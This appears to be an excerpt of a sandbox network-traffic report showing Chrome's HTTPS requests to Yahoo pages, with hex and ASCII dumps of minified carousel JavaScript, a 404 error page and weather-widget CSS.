                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 69 3d 74 2e 77 69 6e 64 6f 77 4c 69 6d 69 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 35 3a 69 3b 73 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 3d 6e 65 77 20 4d 61 70 2c 74 68 69 73 2e 74 61 69 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 79 63 6c 65 3d 21 31 2c 74 68 69 73 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 49 74 65 6d 73 4c 69 6d 69 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 32 29 7d 72 65 74 75 72 6e 20 64 28 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {function e(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t.windowLimit,r=void 0===i?5:i;s(this,e),this.active=null,this.elemMapping=new Map,this.tail=null,this.cycle=!1,this.head=null,this.scrollItemsLimit=Math.floor(r/2)}return d(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 6f 6c 6c 49 74 65 6d 73 4c 69 6d 69 74 3b 69 66 28 74 68 69 73 2e 63 79 63 6c 65 29 7b 69 3c 3d 32 3f 73 3d 30 3a 69 3c 3d 33 26 26 28 73 3d 31 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 46 6f 72 77 61 72 64 28 73 2b 31 29 7d 72 65 74 75 72 6e 20 74 3c 73 3f 6e 75 6c 6c 3a 69 3e 74 2b 73 2d 31 3f 74 68 69 73 2e 67 65 74 46 6f 72 77 61 72 64 28 73 2b 31 29 3a 6e 75 6c 6c 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 45 6c 65 6d 65 6e 74 54 6f 50 72 65 70 65 6e 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 67 65 74 28 74 68 69 73 2e 61 63 74 69 76 65 29 2c 74 3d 65 2e 67 65 74 28 22 69 6e 64 65 78 22 29 2c 69 3d 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 73 69 7a 65 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ollItemsLimit;if(this.cycle){i<=2?s=0:i<=3&&(s=1);return this.getForward(s+1)}return t<s?null:i>t+s-1?this.getForward(s+1):null}},{key:"getElementToPrepend",value:function(){var e=this.elemMapping.get(this.active),t=e.get("index"),i=this.elemMapping.size,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 4d 61 70 70 69 6e 67 2e 73 69 7a 65 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 66 2c 6d 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 69 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 69 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 69 2c 73 29 26 26 28 65 5b 73 5d 3d 69 5b 73 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion(){return this.elemMapping.size}}]),e}(),p=f,m=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var s in i)Object.prototype.hasOwnProperty.call(i,s)&&(e[s]=i[s])}return e},g=function(){function e(e,t){for(var i=0;i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 5b 22 69 6e 64 65 78 22 5d 2c 4b 3d 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4b 26 26 28 65 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 29 7d 2c 5a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 2c 74 3d 21 31 3b 72 65 74 75 72 6e 7b 61 64 64 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 65 29 7d 7d 28 69 29 29 2c 74 68 69 73 2e 65 78 65 63 28 69 2e 5f 75 74 69 6c 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 29 7d 2c 65 78 65 63 3a 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 73 3d 74 68 69 73 3b 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ["index"],K="ontouchstart"in window,Q=function(e,t){K&&(e.style.cursor=t)},Z=function(){var e=[],t=!1;return{add:function(t,i){e.push(function(e){return function(){return t.call(e)}}(i)),this.exec(i._util.transitionDuration)},exec:function(i){var s=this;t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 73 3a 41 2c 69 6e 64 69 63 61 74 6f 72 50 61 67 69 6e 61 74 69 6f 6e 3a 67 2c 69 6e 64 69 63 61 74 6f 72 73 43 75 73 74 6f 6d 43 6f 75 6e 74 3a 76 2c 69 6e 64 69 63 61 74 6f 72 54 79 70 65 3a 5f 2c 69 6e 64 69 63 61 74 6f 72 57 69 74 68 43 6f 75 6e 74 45 6c 65 6d 3a 6b 2c 69 6e 64 69 63 61 74 6f 72 57 69 74 68 6f 75 74 43 6f 75 6e 74 45 6c 65 6d 3a 53 2c 73 6e 61 70 42 65 68 61 76 69 6f 72 3a 64 2c 73 6c 69 64 65 72 45 6c 65 6d 3a 4d 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 73 6c 69 64 65 73 22 29 29 5b 30 5d 7c 7c 65 2c 62 65 68 61 76 69 6f 72 3a 63 2c 6e 65 78 74 42 74 6e 3a 4d 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 6e 65 78 74 2d 62 74 6e 22 29 29 5b 30 5d 2c 70 72 65 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s:A,indicatorPagination:g,indicatorsCustomCount:v,indicatorType:_,indicatorWithCountElem:k,indicatorWithoutCountElem:S,snapBehavior:d,sliderElem:M(e.getElementsByClassName("slides"))[0]||e,behavior:c,nextBtn:M(e.getElementsByClassName("next-btn"))[0],prev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 6a 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 62 6f 75 6e 64 61 72 79 22 29 2c 55 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 74 72 69 67 67 65 72 2d 77 66 2d 64 75 72 69 6e 67 2d 74 72 61 6e 73 69 74 69 6f 6e 22 29 2c 4b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 73 63 72 6f 6c 6c 76 69 65 77 2d 74 64 22 29 2c 5a 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 61 75 74 6f 2d 73 77 69 74 63 68 22 29 29 7c 7c 30 2c 24 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 61 75 74 6f 2d 73 77 69 74 63 68 2d 64 69 73 61 62 6c 65 2d 68 6f 76 65 72 22 29 29 7c 7c 30 2c 65 65 3d 4e 75 6d 62 65 72 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4c 2b 22 64 69 73 61 62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: j=e.getAttribute(L+"boundary"),U=e.getAttribute(L+"trigger-wf-during-transition"),K=e.getAttribute(L+"scrollview-td"),Z=Number(e.getAttribute(L+"auto-switch"))||0,$=Number(e.getAttribute(L+"auto-switch-disable-hover"))||0,ee=Number(e.getAttribute(L+"disab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 72 3a 6e 75 6c 6c 7d 2c 6e 65 2e 73 6c 69 64 65 72 49 74 65 6d 73 3d 4d 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2e 63 68 69 6c 64 72 65 6e 29 3b 76 61 72 20 6c 65 3d 6e 65 2e 73 6c 69 64 65 72 49 74 65 6d 73 2e 6c 65 6e 67 74 68 3b 69 66 28 75 2e 5f 73 74 61 74 65 2e 73 6c 69 64 65 57 69 64 74 68 3d 31 30 30 2f 6c 65 2c 75 2e 75 70 64 61 74 65 57 69 64 74 68 28 29 2c 58 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2c 22 74 72 61 6e 73 66 6f 72 6d 22 2c 6e 65 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 2c 6e 65 2e 74 72 61 6e 73 69 74 69 6f 6e 54 69 6d 69 6e 67 46 75 6e 63 74 69 6f 6e 29 2c 51 28 6e 65 2e 73 6c 69 64 65 72 45 6c 65 6d 2c 22 2d 77 65 62 6b 69 74 2d 67 72 61 62 22 29 2c 6e 65 2e 65 64 67 65 50 61 64 64 69 6e 67 50 65 72 63 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r:null},ne.sliderItems=M(ne.sliderElem.children);var le=ne.sliderItems.length;if(u._state.slideWidth=100/le,u.updateWidth(),X(ne.sliderElem,"transform",ne.transitionDuration,ne.transitionTimingFunction),Q(ne.sliderElem,"-webkit-grab"),ne.edgePaddingPercen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 64 65 72 49 74 65 6d 73 5b 72 5d 3b 73 3d 65 21 3d 3d 61 2c 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 73 2b 22 22 29 3b 76 61 72 20 6e 3d 4e 28 61 29 3b 73 3f 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 7d 29 3a 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 73 63 72 6f 6c 6c 56 69 65 77 57 69 74 68 4e 61 74 69 76 65 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 63 6b 65 64 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: derItems[r];s=e!==a,a.setAttribute("aria-hidden",s+"");var n=N(a);s?n.forEach(function(e){e.setAttribute("tabindex","-1")}):n.forEach(function(e){e.removeAttribute("tabindex")})}}},{key:"scrollViewWithNativeSync",value:function(){if(!this._state.locked){v


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              122192.168.2.45115087.248.119.2524431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC840OUTGET /fp_ms/_rcv/remote?ctrl=WeatherPreviewRefresh&lang=en-US&m_id=react-wafer-weather&m_mode=json&region=US&rid=1fkbtbdjgb12s&site=fp&apptype=default&instance_id=weather&_evtSrc=deferLoad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1275INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 2067
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: AMS58-P6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: hp-BlDFzP-bkoD6FLHxsflk4X_zPWmPoaQ4C4jGQgYkoFJ1F7NHRDQ==
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.pnr.ouryahoo.com https://pnr.ouryahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.onesearch.com https://*.verizonmedia.com https://*.publishing.oath.com https://cdn.taboola.com https://ads.taboola.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=news&region=US&lang=en-US&device=desktop&yrid=6o9nr8tivmg0j&partner=;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 59 61 68 6f 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 61 6c 2d 75 69 22 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html> <html lang="en-us"><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta charset="utf-8"> <title>Yahoo</title> <meta name="viewport" content="width=device-width,initial-scale=1,minimal-ui">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC767INData Raw: 6e 65 6e 74 28 27 25 3c 7b 42 75 63 6b 65 74 7d 63 71 68 5b 3a 32 30 30 5d 3e 27 29 2b 27 22 20 77 69 64 74 68 3d 22 30 70 78 22 20 68 65 69 67 68 74 3d 22 30 70 78 22 2f 3e 27 29 3b 76 61 72 20 62 65 61 63 6f 6e 20 3d 20 6e 65 77 20 49 6d 61 67 65 28 29 3b 62 65 61 63 6f 6e 2e 73 72 63 3d 22 2f 2f 62 63 6e 2e 66 70 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 70 3f 73 3d 31 31 39 37 37 35 37 31 32 39 26 74 3d 22 2b 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2b 22 26 73 72 63 3d 61 77 73 26 65 72 72 5f 75 72 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 29 2b 22 26 65 72 72 3d 25 3c 70 73 73 63 3e 26 74 65 73 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 25 3c 7b 42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nent('%<{Bucket}cqh[:200]>')+'" width="0px" height="0px"/>');var beacon = new Image();beacon.src="//bcn.fp.yahoo.com/p?s=1197757129&t="+new Date().getTime()+"&src=aws&err_url="+encodeURIComponent(document.URL)+"&err=%<pssc>&test="+encodeURIComponent('%<{B


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              123192.168.2.45114587.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC603OUTGET /aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: DMWtXTVc6KJhpkfuowADFm9AwhUIAp3nFDmNmx3Mh1p2hLZL2YNzQgFJjVv0hPbPk4gdhqRn8G+dTUos4ErXp/LPuI/Eo0rQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 4S7SMFQCN65S3QDW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 23:01:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 03 Aug 2022 09:53:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "a03361886464b469acd3a16cfbd022ed"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: vYBRHK1nkH1zZI3a6Ga3.sb6tkLNfuQZ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 3735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 72728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 74 72 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);tra
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 63 6f 6f 74 65 72 29 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 36 70 78 20 36 70 78 20 30 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 61 76 65 64 2d 69 74 65 6d 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: der-width:0 0 1px;color:var(--scooter);line-height:18px;overflow:hidden;padding:6px 6px 6px 0;text-overflow:ellipsis;white-space:nowrap}.wafer-autocomplete-saved-item{white-space:normal;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-alig
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1135INData Raw: 6e 20 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 74 65 6d 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 2d 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 23 6c 6f 63 6b 65 72 57 65 61 74 68 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 75 67 67 65 73 74 69 6f 6e 73 20 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 36 70 78 7d 23 67 72 69 64 2d 6c 61 79 6f 75 74 20 2e 77 61 66 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 74 65 6d 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 29 3b 62 6f 72 64 65 72 3a 30
